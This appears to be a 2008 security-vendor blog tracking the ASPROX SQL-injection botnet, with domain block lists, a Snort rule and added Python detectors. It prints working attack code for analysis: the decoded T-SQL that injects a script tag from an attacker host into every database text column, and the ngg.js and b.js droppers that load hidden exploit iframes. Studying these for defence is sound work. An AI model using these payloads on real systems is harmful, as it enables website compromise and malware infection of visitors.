ASPROX Payload Morphed NGG.JS

New domains found, and a new JavaScript payload "ngg.js" has replaced the previous "b.js".

And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)

New SQL injection payload (hex decoded). The xtype filter 99/35/231/167 selects every ntext/text/nvarchar/varchar column of every user table, so the script tag is appended to everything the site renders:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name,b.name FROM sysobjects a,syscolumns b
  WHERE a.id=b.id AND a.xtype='u'
    AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.apidad.com/ngg.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

What's in ngg.js? The familiar iframe attack from before, but this time it selectively ignores browsers whose language is set to Chinese, Russian, Korean, Hindi, Thai, Urdu or Vietnamese (the check uses navigator.userLanguage, which only IE provides, and IE is what the iframe exploits target anyway). Lovely :)

window.status="";
// IE-only: navigator.userLanguage is undefined elsewhere, so the script simply aborts there
n=navigator.userLanguage.toUpperCase();
// skip visitors whose browser language is Chinese, Urdu, Russian, Korean, Hindi, Thai or Vietnamese
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("updngg=");
// only fire once per victim: the "updngg" cookie marks a browser that already got the iframe
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+11*3600*1000);   // cookie lives 11 hours
document.cookie = "updngg=update;expires="+expires.toGMTString();
try{
// hidden 0x0 iframe pulls the exploit page from the second-stage domain
document.write("<iframe src=http://mainbvd.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}



New ASPROX domains spotted:
apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com


Snort signature to detect access of infected site:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server; uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)

And finally go here to download Sentinel IPS' ASPROX Information Toolkit

Thursday, July 3, 2008

ASPROX Botnet Fingerprinted: 11,816 Zombies

Today at 2pm CST I launched a massive query across our widespread network of Sentinel IPS appliances, pulling the unique source IPs of the ASPROX SQL injection attacks.

Now we have an idea of the size and location of the zombies, and a giant block list, which we have made available right here

**Update** This is the list of infected machines originating the SQL injection attacks, not the number of compromised ASP websites, which is much higher, nearing 100,000.

It was fun to whip up this geo-map of ASPROX's zombies...

Wednesday, July 2, 2008

New ASPROX / SQL Injection Defense Tools

ASPROX is not letting up; many of our clients are still seeing SQL injection attacks blocked every 3-5 minutes on their Sentinel.

Microsoft released a tool (the Microsoft Source Code Analyzer for SQL Injection) for scanning your ASP and ASPX code and identifying SQL injection vulnerabilities. I highly recommend giving it a try: kb-954476

Also HP released a free version of their web security auditing tool specifically to check for SQL injection; it's called Scrawlr and you can get it here


More ASPROX domains (they don't give up, do they?):

tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn


And finally, we are still emailing our ASPROX Toolkit document, which gives information on the attack and how to recover from it if your organization has been compromised.

Tuesday, July 1, 2008

Iframes and IE, vewwy vewwy bad...

Responses poured in from my last post wanting to know how malware can be loaded simply by including an iframe (sourcing HTML from another site).

Well, in case you too are wondering, MS never intended it to be that way....

See http://www.kb.cert.org/vuls/id/516627


New ASPROX domains: dl251.com

Monday, June 30, 2008

ASPROX SQL Compromised my website, now what?

Many people are calling and emailing us for information about ASPROX, and something most people seem to be unaware of is how this affects the visitors to your infected website.

So I will walk you through what happens:

Once your ASP website is compromised by the ASPROX SQL injection you are hosting malware. A malicious piece of JavaScript, "b.js", is loaded from one of the domains listed in my previous posts; the JavaScript sets an "asprox was here" cookie (so the payload only fires once per visitor) and opens a hidden 0-pixel iframe from yet another bad domain, which is "the malware can of worms". These domains constantly rotate IPs (for protection from blocklisting) using fast-flux DNS.

Here is sample content from the JavaScript (b.js):

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
// only fire once per victim: the "updatebng" cookie marks a browser that already got the iframe
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+12*1*60*60*1000);   // cookie lives 12 hours
document.cookie = "updatebng=update;expires="+expires.toGMTString();
try{
// hidden 0x0 iframe pulls the exploit page from the second-stage domain
document.write("<iframe src=http//supbnr.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}


The malware can vary, but is typically a mishmash of exploits targeting several recent browser-based vulnerabilities in QuickTime, Adobe Reader, Flash and even AOL Instant Messenger. Once a vulnerable client visits your site the malware is loaded, and the machine not only becomes a zombie in the ASPROX botnet (the same hosts that attacked your web server), it also installs various nefarious programs like a password stealer that defrauds the user of their online accounts. Infected clients are reported to be sending out bank phishing emails as well.

So in short review for those who are not-so-technical...

If you have a website infected with ASPROX that has not been cleaned/updated/secured, your website is infecting and spreading malware to others who simply view your site in their browser.

That means you have an obligation to address this problem immediately! Please contact us for the information packet on ASPROX defense today.

Thursday, June 26, 2008

ASPROX SQL Injection Attacks cont.

ASPROX continues to ravage the web. Please contact us for the information packet we put together with defense suggestions.

New ASPROX malware domains: app52.com, appid37.com, apps84.com, asp27.com, asp72.com, script46.com, ssl39.com, st212.com, cid26.com, dl251.com, getbwd.com, asp707.com, aspssl63.com, aspx49.com, batch29.com, bin963.com, bios47.com, hlpgetw.com, lang34.com, update34.com, westpacsecuresite.com

Monday, June 23, 2008

ASPROX SQL Injection Botnet and iFrame/Malware

We first noticed this attack when one of our larger clients saw a barrage of SQL injection alerts in the report of their Sentinel IPS (6,000 in one week). We looked into it and found an extremely clever attack which hides the SQL injection payload in a hexadecimal string so that the usual SQL keywords never appear on the wire, evading IDS/IPS signatures. Our device caught the attack at the initial injection stage, hence the hex evasion portion of the attack failed.

So what is the good news? Sentinel IPS, our managed security product, protects against this attack even before it reaches your webserver by catching the initial SQL injection. This means instant protection from this ASP/SQL injection threat without having to rewrite your ASP code overnight.
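To show what the hex evasion described above looks like and how a detector can see through it, here is an added example in Python. It is my code, not the blog's or Sentinel's. It assumes the wrapper shape the ASPROX injector was widely reported to use (DECLARE a variable, CAST a 0x... literal into it, EXEC it), which is not spelled out in the post; the T-SQL body, the request line and the script domain bad.example are constructed for the example and are not from the page. The detector percent-decodes the request, decodes every long hex literal, handles both VARCHAR (ASCII) and NVARCHAR (UTF-16LE) casts, and flags payloads that contain injection markers.

```python
import re
from typing import List, Tuple
from urllib.parse import quote, unquote_plus

# Constructed sample of the injected T-SQL, modelled on the ASPROX cursor
# loop that appends a <script> tag to every text column of every user table.
# The script domain is a placeholder, not one from this page's lists.
SAMPLE_TSQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,"
    "syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 "
    "or b.xtype=231 or b.xtype=167) OPEN Table_Cursor "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+"
    "''<script src=http://bad.example/b.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def hex_wrap(tsql: str, unicode_payload: bool = False) -> str:
    """Wrap T-SQL the way the ASPROX injector did (assumed shape): the request
    only shows DECLARE/CAST/EXEC plus a long 0x... blob, so keyword signatures
    that look for sysobjects, CURSOR or <script> never fire."""
    raw = tsql.encode("utf-16-le" if unicode_payload else "ascii")
    kind = "NVARCHAR(4000)" if unicode_payload else "VARCHAR(4000)"
    return f";DECLARE @S {kind};SET @S=CAST(0x{raw.hex()} AS {kind});EXEC(@S);--"


def build_request(tsql: str, unicode_payload: bool = False) -> str:
    """Constructed request line: the injection tacked onto an ASP page's id parameter."""
    return "GET /product.asp?id=1" + quote(hex_wrap(tsql, unicode_payload)) + " HTTP/1.1"


# Long hex literals only; short ones (colour values, small ids) are ignored.
HEX_BLOB = re.compile(r"0x([0-9A-Fa-f]{16,})")
SUSPECT = re.compile(r"sysobjects|syscolumns|\bCURSOR\b|EXEC\s*\(|<script|xp_cmdshell", re.I)


def decode_hex_payloads(request_line: str) -> List[str]:
    """Percent-decode the request, then decode every long 0x blob in it.
    A CAST to NVARCHAR yields UTF-16LE, visible as every second byte being NUL."""
    text = unquote_plus(request_line)
    decoded = []
    for blob in HEX_BLOB.findall(text):
        if len(blob) % 2:          # odd nibble count: drop the trailing one
            blob = blob[:-1]
        raw = bytes.fromhex(blob)
        if raw[1::2].count(0) > len(raw) // 4:
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def flag_request(request_line: str) -> Tuple[bool, List[str]]:
    """Return (is_injection, decoded payloads that contain injection markers)."""
    hits = [d for d in decode_hex_payloads(request_line) if SUSPECT.search(d)]
    return bool(hits), hits


if __name__ == "__main__":
    for req in (build_request(SAMPLE_TSQL), build_request(SAMPLE_TSQL, True)):
        flagged, hits = flag_request(req)
        print(flagged, hits[0][:80] if hits else None)
```

The point to notice is that the keyword list in SUSPECT is useless on the raw request (none of those words appear in it) and only works after decoding, which is why a signature that matches only the outer DECLARE/CAST/EXEC wrapper, or decodes long hex literals before matching, is what actually catches this family of attacks.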

Grab our ASPROX toolkit for information on cleaning up and defending against this attack.


***UPDATE*** I met with the Dallas US Secret Service office today and this issue is much more widespread than we previously thought. We want to help, so if you have any information for us or need assistance cleaning up this mess, give us a call.

How do you know if your site was compromised? Check your ASP application with your browser by viewing the page source and looking for injected JavaScript (a script tag, or the iframe it writes) sourced from any of the following domains:

***UPDATE*** It may be faster to search the page source for the string "/b.js".

nihaorr1.com, free.hostpinoy.info, xprmn4u.info, nmidahena.com, winzipices.cn, sb.5252.ws, aspder.com, 11910.net, bbs.jueduizuan.com, bluell.cn, 2117966.net, s.see9.us, xvgaoke.cn, 1.hao929.cn, 414151.com, cc.18dd.net, yl18.net, kisswow.com.cn, urkb.net, c.uc8010.com, rnmb.net, ririwow.cn, killwow1.cn, xiaobaishan.net, qiqigm.com, wowgm1.cn, wowyeye.cn, 9i5t.cn, c11.8866.org, computershello.cn, tlcn.net, z008.net, b15.3322.org, qiqicc.cn, direct84.com, heihei117.cn, caocaowow.cn, qiuxuegm.com, locale48.com, firestnamestea.cn, fami4ka.net, redir94.com, rexec39.com, en-us18.com, ck1.in, adjuncnet.com, rundll92.com, sysid72.com, n.uc8010.com, libid53.com, qiqi111.cn, heartgames.cn, logid83.com, datajto.com, adw95.com, tjwh202.162.ns98.cn, jetadwor.com, cookieadw.com, bannerupd.com, nb88.cn, bigadnet.com, 1.cool0.biz, updatebnr.com, flyzhu.9966.org, sslnet72.com, advertbnr.com, script46.com, fengnima.cn, tag58.com, banner82.com, smeisp.cn, hoursebuilds.cn, hyperadw.com, adsitelo.com, okey123.cn, b.kaobt.cn, getadw.com, nihao112.com, al.99.vc, aidushu.net, a.13175.com, chliyi.com, free.edivid.info, 52-o.cn, fucksb.net, 0.actualization.cn, d39.6600.org, h28.8800.org, 001yl.com, ucmal.com, t.uc8010.com, dota11.cn, pingbnr.com, bnrcompro.com, y66.us, m11.3322.org, bc0.cn, clsidw.com, adword71.com, killpp.cn, bnradw.com, cmiia.com, sslput4.com, exe94.com, bnrcntrl.com, w11.6600.org, usuc.us, hlpadw.com, jumpbnr.com, advabnr.com, siteid38.com, msshamof.com, refer68.com, newasp.com.cn, wowgm2.cn, mm.jsjwh.com.cn, updatead.com, win496.com, usuc.us, view89.com, 17ge.cn, err68.com, upgradead.com, adword72.com, kk6.us, clickbnr.com, 117275.cn, c23.2288.org, sysid72.com, encode72.com, exec51.com, pingadw.com, vb008.cn, wow112.cn, nihaoel3.com, p060523.info, o7n9.cn, rundll841.com, jetdbs.com, dbdomaine.com, domaincld.com, clsiduser.com, heiheinn.cn, coldwop.com, alzhead.com, chinabnr.com, adwbnr.com, chkbnr.com, chkadw.com
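The view-source check above, and the b.js behaviour described in the June 30 post, as an added example in Python (my code, not the blog's or Sentinel's). It parses saved page source and reports script tags that load /b.js or come from a listed domain, plus iframes that are sourced from a listed domain or are zero-sized, which is what the b.js sample writes. BAD_DOMAINS is a small subset of the lists on this page plus supbnr.com from the b.js sample; the sample HTML is constructed for the example.

```python
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlsplit

# Subset of the ASPROX domains listed on this page, plus supbnr.com from the
# b.js sample. Extend with the full lists before running this for real.
BAD_DOMAINS = {
    "nihaorr1.com", "winzipices.cn", "direct84.com", "updatebnr.com",
    "dl251.com", "app52.com", "script46.com", "supbnr.com",
}

# Constructed sample page: one legitimate site script, the injected <script>
# tag appearing once per rendered text column (the ASPROX injection appends
# it to every text column, so it repeats), and the hidden iframe b.js writes.
SAMPLE_HTML = """<html><head><title>Widgets</title>
<script src="/js/site.js"></script></head>
<body><h1>Blue Widget<script src=http://nihaorr1.com/b.js></script></h1>
<p>Great for gardens<script src=http://nihaorr1.com/b.js></script></p>
<iframe src=http://supbnr.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>
</body></html>"""


def is_bad_host(host: str) -> bool:
    """True if host is a listed domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BAD_DOMAINS)


class InjectionFinder(HTMLParser):
    """Collects (tag, src, reason) for script/iframe tags that look injected."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        if not src or tag not in ("script", "iframe"):
            return
        host = urlsplit(src).hostname or ""   # "" for relative (local) sources
        if tag == "script" and src.lower().endswith("/b.js"):
            self.findings.append((tag, src, "loads /b.js"))
        elif is_bad_host(host):
            self.findings.append((tag, src, "known ASPROX domain"))
        elif tag == "iframe" and (a.get("width") == "0" or a.get("height") == "0"):
            self.findings.append((tag, src, "zero-size iframe"))


def scan_html(html: str) -> List[Tuple[str, str, str]]:
    """Parse saved page source and return every suspicious script/iframe."""
    finder = InjectionFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def b_js_count(html: str) -> int:
    """The quick check from the post: how many times does '/b.js' appear?"""
    return len(re.findall(r"/b\.js\b", html, re.I))


if __name__ == "__main__":
    print(b_js_count(SAMPLE_HTML), "references to /b.js")
    for tag, src, reason in scan_html(SAMPLE_HTML):
        print(f"{tag:7} {reason:22} {src}")
```

Because the injection rewrites database columns rather than files, the tag shows up wherever those columns are rendered, so finding it in one page means the database itself needs cleaning, not just that page.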